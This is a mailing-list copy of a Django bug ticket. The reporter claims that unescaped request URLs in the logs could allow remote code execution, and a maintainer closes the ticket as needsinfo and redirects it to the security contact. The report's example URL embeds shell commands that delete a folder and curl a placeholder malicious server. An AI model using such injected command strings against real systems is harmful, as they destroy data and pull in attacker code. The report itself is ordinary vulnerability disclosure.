[Django] #33610: Django does not escape the request url in default logging mechanism and may be vulnerable to remote code execution

7 views
Skip to first unread message

Django

unread,
Mar 31, 2022, 12:46:32 AM3/31/22
to django-...@googlegroups.com
#33610: Django does not escape the request url in default logging mechanism and may
be vulnerable to remote code execution
-----------------------------------------+------------------------
Reporter: Dhananjay1992 | Owner: nobody
Type: Bug | Status: new
Component: Utilities | Version: 4.0
Severity: Normal | Keywords:
Triage Stage: Unreviewed | Has patch: 0
Needs documentation: 0 | Needs tests: 0
Patch needs improvement: 0 | Easy pickings: 0
UI/UX: 0 |
-----------------------------------------+------------------------
**Issue**:

When logging enabled in Django the log_response method in log.py of
django.utils package logs the given url in the log file as it is without
escaping the url which may lead to remote code execution.

**For example:**
An attacker hits the Django project with this url: <hostname>/cgi-bin;cd
/var/temp;rm -rf <any folder>; curl <malicious remote server url>

In this case we can see the log file entry with warning (yes because of
404 not found error level is warning) with given url as it is. IMHO we
should escape the request response logging so as to minimise the remote
code execution possibilities

--
Ticket URL: <https://code.djangoproject.com/ticket/33610>
Django <https://code.djangoproject.com/>
The Web framework for perfectionists with deadlines.

Django

unread,
Mar 31, 2022, 12:46:51 AM3/31/22
to django-...@googlegroups.com

Django

unread,
Mar 31, 2022, 12:46:51 AM3/31/22
to django-...@googlegroups.com

Django

unread,
Mar 31, 2022, 4:44:15 AM3/31/22
to django-...@googlegroups.com
#33610: Django does not escape the request url in default logging mechanism and may
be vulnerable to remote code execution
---------------------------+--------------------------------------
Reporter: DJD | Owner: nobody
Type: Bug | Status: closed
Component: Utilities | Version: 4.0
Severity: Normal | Resolution: needsinfo

Keywords: | Triage Stage: Unreviewed
Has patch: 0 | Needs documentation: 0
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
---------------------------+--------------------------------------
Changes (by Carlton Gibson):

* status: new => closed
* resolution: => needsinfo


Comment:

Please don't report security issues here! Contact
secu...@djangoproject.com instead.

It's not clear how logging leads to a code execution but please send a
full proof of concept to secu...@djangoproject.com and we can review.
Thanks.

--
Ticket URL: <https://code.djangoproject.com/ticket/33610#comment:1>

Reply all
Reply to author
Forward
0 new messages